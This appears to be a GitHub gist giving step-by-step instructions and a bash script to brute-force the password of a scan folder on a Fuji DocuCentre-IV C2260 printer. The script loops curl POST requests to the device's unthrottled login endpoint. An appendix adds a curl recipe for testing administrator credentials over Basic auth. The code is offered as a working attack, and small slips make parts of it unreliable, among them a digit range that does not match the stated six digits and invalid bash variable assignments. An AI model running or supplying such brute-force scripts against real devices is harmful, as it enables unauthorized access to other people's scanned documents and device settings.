Last active
April 20, 2018 18:31
-
-
Save syncom/88edd9dcd0091cf14ba6bfc04868a306 to your computer and use it in GitHub Desktop.
HOWTO: brute force Fuji DocuCentre-IV C2260 Scan folder's password
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This instruction describes how to brute force the "Scan" folder's password on a Fuji DocuCentre-IV C2260 Version | |
1.8 printer/xerox copier. | |
The DocuCentre-IV C2260 runs a web server at port 80. Because the HTTP interface is not secured, one could also | |
mount a man-in-the-middle (MITM) attack. However, doing a MITM attack is not what we are discussing here. The | |
web application at port 80 has an interface (in UI, under the Scan>Folder menu) to which mutiple users deliver | |
their scanned documents. These folders are password protected. It turns out getting access to such a folder can | |
be done through a simple HTTP POST command. And this command is not throttled upon access failure. Therefore, it | |
allows us to automate the authentication process and thus brute force the password. | |
Suppose the IP address of the web server is 192.168.1.42. | |
Suppose we want to brute force the folder with a folder number '005' in the web UI. | |
Because it requires a user to manually enter the password from the printer's keyboards when a document is scanned | |
into it, we further use the heuristic that the password is a short (less than or equal to 6 digits) number. | |
Here is the code to do so, from under a Linux bash shell. | |
# Start of code | |
function trypass { | |
mypass=$1 | |
myfolder=$2 | |
machineip=$3 | |
# Here the '-m 10' option sets the default timeout to 10 sec | |
mycode=$(curl -m 10 -s -o /dev/null -w "%{http_code}\\n" \ | |
-d "PWD=${mypass}&SET=1&BOX=${myfolder}&ORD=DD" \ | |
-H "Content-Type: application/x-www-form-urlencoded" \ | |
-X POST http://${machineip}/PBPWD.cmd) | |
echo ${mycode} | |
} | |
MYIP=192.168.1.42 | |
for i in `seq 99999`; | |
do | |
mycode=$(trypass $i 5 $MYIP) | |
while [ $mycode -eq 000 ] | |
# Retry | |
do | |
sleep 10 | |
mycode=$(trypass $i 5 $MYIP) | |
done | |
echo "$i: $mycode" | |
if [ $mycode -eq 200 ] | |
then break | |
fi | |
done > folder_5.txt | |
# End of code | |
Inspect the content of folder_5.txt for the last entry/row. If password brute forcing succeeds, the last entry will | |
be of the form "<password>: 200". | |
Appendix: | |
Here is a recipe for brute forcing the administrator login through the 'prop.htm' interface. | |
# Start of code (bash script) | |
$mylogin="username:password" | |
$mybasicauth=$(echo -n ${mylogin} | openssl base64) | |
curl -s -o /dev/null -w "%{http_code}\\n" -X GET http://192.168.1.188/prop.htm -H "Authorization: Basic $mybasicauth" | |
# End of code | |
The above script returns the HTTP status code (200 on success; 401 on failure). |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment